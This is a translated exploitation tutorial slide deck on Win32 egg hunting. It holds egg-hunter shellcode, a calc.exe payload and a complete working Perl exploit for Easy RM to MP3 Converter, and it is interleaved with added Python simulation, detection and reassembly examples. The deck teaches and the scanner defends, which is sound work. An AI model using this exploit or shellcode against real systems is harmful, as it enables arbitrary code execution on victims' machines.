System Hacking & Reverse Engineering documented by h2spice [email protected] [ Buffer Overflow - Egg Hunting ]

System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Page 1: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Page 2: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Who am I

Sanghwan Ahn (h2spice)

Works for LINE Corp.

Carries out vulnerability research (exploitation, hunting, analysis)

Page 3: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Curriculum Overview

System Hacking / Reversing

Vulnerability Fundamentals
  Buffer Overflow
  Format String Bug
  Stack Overflow
  Use After Free
  Heap Overflow

Exploitation (Win32/*NIX/ARM)
  Overwriting RET
  Egg Hunting
  Overwriting SEH
  RTL
  ROP
  Heap Spraying
  Overwriting .dtors
  Overwriting GOT

Vulnerability / Malware Analysis
  Malware Analysis
  Bug Hunting
  x86 / ARM
  Vulnerability Analysis
  Software on x86
  Mobile
  Source Code Analysis
  Fuzzing
  CVE-XXXX-XXXX
  Exploit-DB, Inj3ct0r, 1337day

Reverse Engineering
  iOS
  Android

Page 4: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Table of Contents / Curriculum Overview

Track3 - Exploitation
  Introduction
  Track3-1 Win32
    Overwrite RET
    Overwrite SEH
    Egg-Hunting
    ROP
    Heap Spray
  Track3-2 *NIX
    Overwrite RET
    RTL
    Overwrite .dtors
    Overwrite GOT
  Track3-3 ARM
    Overwrite RET
    RTL
    ROP

Page 5: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Track3. Exploitation

Page 6: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Track3. Exploitation
  Introduction
  Track3-1 Win32
    Overwrite RET
    Overwrite SEH
    Egg-Hunting
    ROP (Return Oriented Programming)
    Heap Spray
  Track3-2 *NIX
    Overwrite RET
    Ret-to-LibC
    Overwrite .dtors
    Overwrite GOT
  Track3-3 ARM
    Overwrite RET
    Ret-to-LibC
    ROP (Return Oriented Programming)

Page 7: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

What is Egg-Hunting?

A technique that relies on searching the process's VAS (Virtual Address Space)

Useful when the attackable vector provides only a very small buffer (on the premise that the attacker can already control the program's flow)

Egg hunting basically consists of three pieces of code:
  Egg Hunter Code
  Marker or Tag
  Arbitrary Shell Code


Page 8: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Egg-Hunter code work?

Egg-Hunter Code
    \x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8
    \x77\x30\x30\x74    (marker/tag: w00t)
    \x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7

Marker / Tag
    \x77\x30\x30\x74\x77\x30\x30\x74    (w00tw00t)

Shell Code (Calc)
    \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a

Page 13: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Egg-Hunter code work?

1. Search memory and find the marker
2. Store the marker's address and jump there
3. Execute the shell code

Page 14: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Important in order for Egg-Hunting to work

Control of the program's flow from user input: you must be able to jump to (jmp, call, push/ret) and execute some shellcode.

The egg-hunter code must sit in a predictable memory region: it must be available in a predictable location, so you can reliably jump to it and execute it.

The marker/tag must be a unique identifier placed in front of the final shellcode: you must prepend the final shellcode with a unique string/marker/tag.

Test the memory-search techniques to find the one that suits a particular system best (IsBadReadPtr, NtDisplayString, NtAccessCheck/AuditAlarm, NtDisplayString/NtAccessCheckAndAuditAlarm): you'll have to test which technique to search memory works for a particular exploit.

The buffer only has to be large enough to hold the egg-hunter code: the amount of available buffer space can be relatively small, because it will only contain the so-called "egg-hunter".

The final shellcode may be at an arbitrary location in memory (stack/heap/etc.): it must be available somewhere in memory.


Page 15: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Egg-Hunter using SEH injection

my $egghunter = "\xeb\x21\x59\xb8"."w00t".
    "\x51\x6a\xff\x33\xdb\x64\x89\x23".
    "\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".
    "\x07\xff\xe7\x66\x81\xcb\xff\x0f".
    "\x43\xeb\xed\xe8\xda\xff\xff\xff".
    "\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".
    "\x83\x04\x08\x06\x58\x83\xc4\x10".
    "\x50\x33\xc0\xc3";

Egg-hunter Code using SEH injection

    EB21           jmp short 0x23
    59             pop ecx
    B890509050     mov eax,0x50905090   ; this is the Marker
    51             push ecx
    6AFF           push byte -0x1
    33DB           xor ebx,ebx
    648923         mov [fs:ebx],esp
    6A02           push byte +0x2
    59             pop ecx
    8BFB           mov edi,ebx
    F3AF           repe scasd
    7507           jnz 0x20
    FFE7           jmp edi
    6681CBFF0F     or bx,0xfff
    43             inc ebx
    EBED           jmp short 0x10
    E8DAFFFFFF     call 0x2
    6A0C           push byte +0xc
    59             pop ecx
    8B040C         mov eax,[esp+ecx]
    B1B8           mov cl,0xb8
    83040806       add dword [eax+ecx],byte +0x6
    58             pop eax
    83C410         add esp,byte +0x10
    50             push eax
    33C0           xor eax,eax
    C3             ret

Egg hunter size = 60 bytes, Egg size = 8 bytes

Page 16: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Egg-Hunter using SEH injection

1. Move the marker to EAX
2. Repeat until the marker is found

Page 17: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Egg-Hunter using IsBadReadPtr

my $egghunter = "\x33\xdb\x66\x81".
    "\xcb\xff\x0f\x43\x6a\x08\x53\xb8".
    "\x0d\x5b\xe7\x77\xff\xd0\x85\xc0".
    "\x75\xec\xb8"."w00t".
    "\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4".
    "\xff\xe7";

Egg-hunter Code using IsBadReadPtr

    33DB           xor ebx,ebx
    6681CBFF0F     or bx,0xfff
    43             inc ebx
    6A08           push byte +0x8
    53             push ebx
    B80D5BE777     mov eax,0x77e75b0d
    FFD0           call eax
    85C0           test eax,eax
    75EC           jnz 0x2
    B890509050     mov eax,0x50905090   ; this is the Marker
    8BFB           mov edi,ebx
    AF             scasd
    75E7           jnz 0x7
    AF             scasd
    75E4           jnz 0x7
    FFE7           jmp edi

Egg hunter size = 37 bytes, Egg size = 8 bytes

Page 18: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Egg-Hunter using IsBadReadPtr

1. Move the marker to EAX
2. Repeat until the marker is found

Page 19: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Egg-Hunter using NtDisplayString

my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A".
    "\x43\x58\xCD\x2E\x3C\x05\x5A\x74".
    "\xEF\xB8"."w00t".
    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7".
    "\xFF\xE7";

Egg-hunter Code using NtDisplayString

    6681CAFF0F     or dx,0x0fff
    42             inc edx
    52             push edx
    6A43           push byte +0x43
    58             pop eax
    CD2E           int 0x2e
    3C05           cmp al,0x5
    5A             pop edx
    74EF           jz 0x0
    B890509050     mov eax,0x50905090   ; this is the Marker
    8BFA           mov edi,edx
    AF             scasd
    75EA           jnz 0x5
    AF             scasd
    75E7           jnz 0x5
    FFE7           jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

Page 20: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Egg-Hunter using NtDisplayString

1. Move the marker to EAX
2. Repeat until the marker is found

Page 21: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting


Egg-Hunter using NtAccessCheck(AndAuditAlarm)

my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A".
    "\x02\x58\xCD\x2E\x3C\x05\x5A\x74".
    "\xEF\xB8"."w00t".
    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7".
    "\xFF\xE7";

Egg-hunter Code using NtAccessCheckAndAuditAlarm

    6681CAFF0F     or dx,0x0fff
    42             inc edx
    52             push edx
    6A02           push byte +0x02
    58             pop eax
    CD2E           int 0x2e
    3C05           cmp al,0x5
    5A             pop edx
    74EF           jz 0x0
    B890509050     mov eax,0x50905090   ; this is the Marker
    8BFA           mov edi,edx
    AF             scasd
    75EA           jnz 0x5
    AF             scasd
    75E7           jnz 0x5
    FFE7           jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

This one is similar in form to the egg hunter that uses NtDisplayString, but it is a different kind of egg hunter, with the form shown above. Instead of NtDisplayString it uses NtAccessCheckAndAuditAlarm (offset 0x02 in the KiServiceTable), so that the access violations the egg hunter's memory reads could otherwise cause are avoided.

For details on NtAccessCheck see the links below:
- http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf
- http://xosmos.net/txt/nativapi.html

Page 22: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

1. Move the marker to EAX
2. Repeat until the marker is found

Page 23: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Egg-Hunter using NtAccessCheck(AndAuditAlarm), step by step

1. Set the address at which the memory search starts
2. Increment the address for the next memory search
3. Save the address currently being examined on the stack
4. Put 0x2 into EAX for NtAccessCheckAndAuditAlarm (the syscall argument), then invoke the syscall
5. Check whether an access violation (ACCESS_VIOLATION) occurred
6. Restore EDX
7. If an access violation occurred, jump back to the starting point (0x12cd6c)
8. Load the marker; store the search address (EDX) in EDI; compare the marker (EAX) with the memory at the search address (EDI)
9. If the marker is not found, jump back to the starting point (0x12cd6c)
10. When the marker is found, jump to that location (Final Shellcode)
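The ten steps above, and the search/find/jump sequence on the earlier "How does the Egg-Hunter code work?" pages, reduce to one loop: align to a page, ask the kernel whether the address is readable, and only then compare two dwords. The following is an added example, not code from the slides and not the hunter itself: a Python model of that loop, with the address space, the mapped pages, the decoy and the tag constructed here. STATUS_ACCESS_VIOLATION is the real NTSTATUS value whose low byte the `cmp al,0x5` tests; modelling the kernel's pointer check as an 8-byte readability probe is an assumption of this model.

```python
# Added example, not from the slides: a Python model of the NtAccessCheckAndAuditAlarm
# egg-hunter loop (page walk, syscall probe, two-dword compare, jump).  The memory
# layout, the decoy page and the tag are constructed for the demonstration.

PAGE = 0x1000
STATUS_ACCESS_VIOLATION = 0xC0000005   # low byte 0x05 is what 'cmp al,0x5' tests
TAG = b"w00t"                          # 4-byte marker; the egg is the tag written twice


class Memory:
    """A sparse 32-bit address space: only pages listed in `pages` are mapped."""

    def __init__(self, pages):
        # base address -> exactly one page of bytes (short data is zero-padded)
        self.pages = {base: bytes(data).ljust(PAGE, b"\x00")[:PAGE]
                      for base, data in pages.items()}

    def readable(self, addr):
        return (addr & ~0xFFF) in self.pages

    def probe(self, addr):
        """Model of 'push edx ; push 2 ; pop eax ; int 0x2e'.

        Assumption of this model: the kernel validates the 8-byte structure
        argument at edx before doing anything else and returns
        STATUS_ACCESS_VIOLATION if it is not readable, so the hunter itself
        never touches unmapped memory.
        """
        if self.readable(addr) and self.readable(addr + 7):
            return 0
        return STATUS_ACCESS_VIOLATION

    def read(self, addr, n):
        """Read n bytes; only called after a successful probe."""
        return bytes(self.pages[a & ~0xFFF][a & 0xFFF] for a in range(addr, addr + n))


def egg_hunt(mem, tag=TAG, start=0x0, end=0x80000000):
    """Return (address the hunter would 'jmp edi' to, syscalls issued, bytes compared).

    Control flow mirrors the 32-byte hunter on the slides:
      entry:  or dx,0xfff ; inc edx          -> step to the next page boundary
      loop:   push edx ; push 2 ; pop eax ; int 0x2e ; cmp al,5 ; pop edx ; jz entry
              mov eax,tag ; mov edi,edx ; scasd ; jnz next ; scasd ; jnz next ; jmp edi
      next:   inc edx  (falls back into loop)
    """
    syscalls = compared = 0
    addr = (start | 0xFFF) + 1                       # entry: or dx,0xfff / inc edx
    while addr < end:
        syscalls += 1
        if (mem.probe(addr) & 0xFF) == (STATUS_ACCESS_VIOLATION & 0xFF):
            addr = (addr | 0xFFF) + 1                # jz entry: skip the unmapped page
            continue
        window = mem.read(addr, 8)
        compared += 4                                # first scasd
        if window[:4] == tag:
            compared += 4                            # second scasd only runs on a first hit
            if window[4:] == tag:
                return addr + 8, syscalls, compared  # edi now points just past the egg
        addr += 1                                    # jnz next: inc edx
    return None, syscalls, compared


def demo():
    # Constructed layout: a mapped page holding the tag once (as the hunter's own
    # 'mov eax,imm32' does), three unmapped pages, then the page with the real egg.
    mem = Memory({
        0x1000: b"A" * 0x10 + TAG + b"AAAA" + b"A" * 0x100,
        0x5000: b"\x00" * 0x100 + TAG + TAG + b"PAYLOAD-STAND-IN",
    })
    return egg_hunt(mem)


if __name__ == "__main__":
    found, syscalls, compared = demo()
    print(f"egg at {found - 8:#x}, jump target {found:#x}; "
          f"{syscalls} probes, {compared} bytes compared")
```

Two things the model makes visible: the single copy of the tag in the decoy page passes the first `scasd` and fails the second, which is why the egg is the tag written twice and why a hunter carrying the tag in its own `mov eax,imm32` does not find itself; and the three unmapped pages cost three syscalls rather than 12288 reads, which is what the `or dx,0xfff ; inc edx` prefix buys.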

Page 34: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Exercise Time :D

Target Info
  Win32
  Easy RM to MP3 Converter v.2.7.3.700
  Download link: http://outofcontrol.co.kr/vulnApp/EasyRM.zip

Vulnerability Type
  Buffer Overflow (Stack Based), triggered by parsing a playlist


Page 35: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Exercise Time :D

Tip
  Generate a pattern using the mona plugin (!mona pattern_create 30000)
  NOP sleds (0x90 * N)
  Shell code (windows/exec calc.exe):
    "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";


Page 36: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Exercise Time :D

Exploit Info
  .m3u playlist file format
  Length of the junk data is 26039
  Gadget is 0x7608fcfe (jmp esp from MSRMCcodec02.dll)


Page 37: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Exercise Time :D

Exploit Code (EggHuntingExploit.pl)

    my $file = "EggHuntingExploit.m3u";

    my $junk = "A" x 26039;
    my $eip  = pack('V', 0x7608fcfe);   # jmp esp from MSRMCcodec02.dll

    my $padding = "\x90" x 25;
    my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
                    "\x77\x30\x30\x74".   # this is the marker/tag: w00t
                    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

    # windows/exec - 144 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # EXITFUNC=seh, CMD=calc
    my $shellcode = $padding .
        "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
        "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
        "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
        "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
        "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
        "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
        "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
        "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
        "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
        "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
        "\x7f\xe8\x7b\xca";

    open($FILE, ">$file");
    print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode;
    close($FILE);
    print "m3u File Created successfully\n";
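Seen from the other side, the file this script writes has a very recognisable shape: a playlist line tens of kilobytes long, a run of a single byte, bytes that never occur in a text format, one of the hunter stubs from these slides, and a four-byte tag written twice. The following is an added example, not part of the slides or of the exploit: a Python scanner that checks an .m3u for exactly those properties. The signature bytes are copied from the hunter listings above; the sample files, the thresholds and the finding labels are constructed here.

```python
# Added example, not from the slides: a defender-side scan of an .m3u playlist for
# the structure the exploit above produces.  Signatures are byte sequences taken
# from the egg-hunter listings on these slides; the sample files are constructed.
import re

# Instruction sequences shared by the hunters shown above (the labels are descriptive).
HUNTER_SIGS = {
    "or dx,0xfff / inc edx page walk (NtDisplayString, NtAccessCheck hunters)": b"\x66\x81\xca\xff\x0f\x42",
    "or bx,0xfff / inc ebx page walk (IsBadReadPtr, SEH hunters)": b"\x66\x81\xcb\xff\x0f\x43",
    "int 0x2e probe followed by cmp al,0x5": b"\xcd\x2e\x3c\x05",
    "mov edi,edx ; scasd ; jnz ; scasd ; jnz ; jmp edi": b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7",
    "mov edi,ebx ; scasd ; jnz ; scasd ; jnz ; jmp edi": b"\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7",
}
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def scan_playlist(data, max_line=1024, min_run=256):
    """Return a list of (kind, offset, detail) findings; an empty list means nothing odd."""
    findings = []
    # 1. A playlist is text made of short lines; the exploit needs one line of 26039+ bytes.
    offset = 0
    for line in data.split(b"\n"):
        if len(line) > max_line:
            findings.append(("long-line", offset, f"{len(line)} bytes"))
        offset += len(line) + 1
    # 2. Bytes outside printable ASCII / CR / LF / TAB do not belong in an .m3u.
    nontext = sum(1 for b in data if b not in TEXT_BYTES)
    if nontext:
        findings.append(("non-text", 0, f"{nontext} non-text bytes"))
    # 3. Long single-byte runs: the "A" x 26039 junk and NOP sleds.
    for m in re.finditer(rb"(.)\1{%d,}" % (min_run - 1), data, re.DOTALL):
        findings.append(("byte-run", m.start(), f"{len(m.group())} x {m.group(1)!r}"))
    # 4. Known egg-hunter instruction sequences.
    for name, sig in HUNTER_SIGS.items():
        for m in re.finditer(re.escape(sig), data):
            findings.append(("hunter-stub", m.start(), name))
    # 5. A 4-byte tag written twice back to back (the egg), ignoring single-byte runs.
    for m in re.finditer(rb"(.{4})\1", data, re.DOTALL):
        if len(set(m.group(1))) > 1:
            findings.append(("doubled-tag", m.start(), repr(m.group(1))))
    return findings


# Constructed sample shaped like the exploit playlist: junk, the return-address bytes,
# a NOP pad, the NtAccessCheck hunter from the slides, the doubled tag and a
# stand-in for the final shellcode (not a real payload).
HUNTER = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
          + b"w00t" + b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
SUSPECT_M3U = (b"#EXTM3U\r\n" + b"A" * 2048 + b"\xfe\xfc\x08\x76" + b"\x90" * 25
               + HUNTER + b"w00tw00t" + b"\x90" * 8 + bytes(range(0xD0, 0xF0)) + b"\r\n")
BENIGN_M3U = (b"#EXTM3U\r\n#EXTINF:215,Sample Artist - Sample Title\r\n"
              b"C:\\Music\\track01.mp3\r\n")


if __name__ == "__main__":
    for kind, off, detail in scan_playlist(SUSPECT_M3U):
        print(f"{kind:12} @ {off:6}  {detail}")
    print("benign findings:", scan_playlist(BENIGN_M3U))
```

Checks 1 to 3 are format checks and need no signature at all: a parser that refuses playlist entries longer than a sane path length stops this file before any hunter bytes matter, which is also the fix on the application side. Checks 4 and 5 are the specific signal; the doubled-tag rule deliberately skips `AAAAAAAA` so the junk run does not drown it.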


Page 38: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

What is the Omelet Egg-Hunter?

A shellcode fragmentation technique

Introduced by Skylined (Berend-Jan Wever) (http://code.google.com/p/w32-seh-omelet-shellcode/)

Useful when the attackable vector provides only a very small buffer and the attacker controls only several small, scattered pieces of memory

The basic idea is the same as a normal egg hunter, with the following differences:
  The final shellcode is split into several pieces (multiple eggs)
  The final shellcode is reassembled before it is executed (it is not executed as soon as it is found)
  It is larger than a normal egg hunter (about 90 bytes)


Page 39: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet Egg-Hunter work?

Fragmentation layout of the original shellcode
  Length of the egg
  Index number
  3-byte marker
  Fragmented shellcode (1/n, 2/n, 3/n ... n/n)

Omelet Egg-Hunter code
  Searches through memory
  Looks for all eggs
  Assembles the fragments into the final shellcode (reproduces the original shellcode at the bottom of the stack)
  Jumps to the reproduced shellcode and executes it

Page 40: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet Egg-Hunter work?

Original Shellcode, fragmented

Fragmented Shellcode 1/3: Length(32) Index(01) Marker
    \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Fragmented Shellcode 2/3: Length(32) Index(02) Marker
    \x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30

Fragmented Shellcode 3/3: Length(32) Index(03) Marker
    \x4a\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

Omelet Egg-Hunter Code
  Search memory, find the marker
  Assemble the fragmented shellcode, jump to the final shellcode and execute it
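The egg layout on the two pages above ([length][index][3-byte marker][fragment]) is what makes the omelet reassemblable: the marker is what the search keys on, and the index is what puts the pieces back in order regardless of where they land. The following is an added example, not code from the slides or from Skylined's project: a Python model of that layout and of the collect-and-reassemble check, the same check an analyst runs over a captured buffer to recover the original payload and to tell whether the set of eggs is complete. The marker, the payload stand-in and the buffer layouts are constructed here.

```python
# Added example, not from the slides: a Python model of the omelet egg layout
# described above ([length][index][3-byte marker][fragment]) and of the collect-
# and-reassemble check the hunter performs.  The marker, the payload stand-in
# and the buffer layouts are constructed here.

EGG_DATA = 32          # payload bytes per egg, as in the slide (Length(32))
MARKER = b"OML"        # constructed 3-byte marker stand-in


def fragment(payload, marker=MARKER, size=EGG_DATA):
    """Split payload into eggs [len][index][marker][data]; indices start at 1."""
    chunks = [payload[i:i + size] for i in range(0, len(payload), size)]
    return [bytes([len(c), i]) + marker + c for i, c in enumerate(chunks, start=1)]


def collect_eggs(buf, expected, marker=MARKER, size=EGG_DATA):
    """Search buf for eggs and rebuild the payload.

    Returns (payload, missing).  payload is None unless every index
    1..expected was seen; missing lists the indices that were not.
    The search keys on the marker, as the hunter does, and reads the
    length and index from the two bytes in front of it, so each hit is
    validated before it is accepted: index in range, length plausible,
    data fully inside the buffer, and only the last egg may be short.
    """
    found = {}
    pos = buf.find(marker)
    while pos != -1:
        if pos >= 2:
            length, index = buf[pos - 2], buf[pos - 1]
            data = buf[pos + len(marker):pos + len(marker) + length]
            ok = (1 <= index <= expected and 0 < length <= size
                  and len(data) == length and (length == size or index == expected))
            if ok and index not in found:
                found[index] = data
        pos = buf.find(marker, pos + 1)
    missing = [i for i in range(1, expected + 1) if i not in found]
    if missing:
        return None, missing
    return b"".join(found[i] for i in range(1, expected + 1)), []


PAYLOAD = bytes(range(80))      # constructed stand-in for the original shellcode
EGGS = fragment(PAYLOAD)        # 32 + 32 + 16 bytes -> three eggs
JUNK = b"A" * 40

# Eggs scattered out of order, plus a decoy that carries the marker but an
# index (9) outside 1..3; the second buffer lacks egg 2 entirely.
SCATTERED = (JUNK + EGGS[2] + JUNK + b"\x20\x09" + MARKER + JUNK
             + EGGS[0] + JUNK + EGGS[1] + JUNK)
INCOMPLETE = JUNK + EGGS[2] + JUNK + EGGS[0] + JUNK


def demo():
    return collect_eggs(SCATTERED, expected=3), collect_eggs(INCOMPLETE, expected=3)


if __name__ == "__main__":
    (payload, _), (_, missing) = demo()
    print("reassembled:", payload == PAYLOAD, "| missing in second buffer:", missing)
```

The validation in `collect_eggs` is the part worth keeping when analysing a real capture: a marker hit with an out-of-range index or a length that runs past the buffer is noise, not an egg, and a missing index means the buffer you have is not the whole payload.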

Page 41: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: the omelet egg-hunter code (search memory and find the marker; reassemble the fragmented shellcode, then jump to the final shellcode and execute it) beside the three eggs "Fragmented Shellcode 1/3, 2/3, 3/3", each headed by Length(32), Index(01/02/03) and Marker, and the "Original Shellcode" area, still empty.]

Step 1: Search through memory

Page 42: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area is still empty.]

Step 2: Find marker

Page 43: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area is still empty.]

Step 3: Check length/index

Page 44: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area now holds fragment 1.]

Step 3 (continued): Reproduce the original shellcode at the bottom of the stack

Page 45: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds fragment 1.]

Step 4: Search through memory

Page 46: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds fragment 1.]

Step 5: Find marker

Page 47: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds fragment 1.]

Step 6: Check length/index

Page 48: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area now holds fragments 1 and 2.]

Step 6 (continued): Reproduce the original shellcode at the bottom of the stack

Page 49: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds fragments 1 and 2.]

Step 7: Search through memory

Page 50: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds fragments 1 and 2.]

Step 8: Find marker

Page 51: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds fragments 1 and 2.]

Step 9: Check length/index

Page 52: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area now holds fragments 1, 2 and 3, the complete shellcode.]

Step 9 (continued): Reproduce the original shellcode at the bottom of the stack

Page 53: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How does the Omelet-Egg-Hunter work?

[Figure: same diagram; the "Original Shellcode" area holds the complete reassembled shellcode.]

Step 10: Jump to the reproduced shellcode and execute it

Page 54: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Page 55: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Download the omelet code package (scripts that fragment the shellcode and generate the omelet code):

W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list

Page 56: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make the Omelet-Egg-Hunter?

Create the shellcode file (makingShellCodeForOmelet.pl):

    # Write the raw shellcode bytes to shellcode.bin so w32_SEH_omelet.py can split it into eggs
    my $scfile = "shellcode.bin";
    my $shellcode =
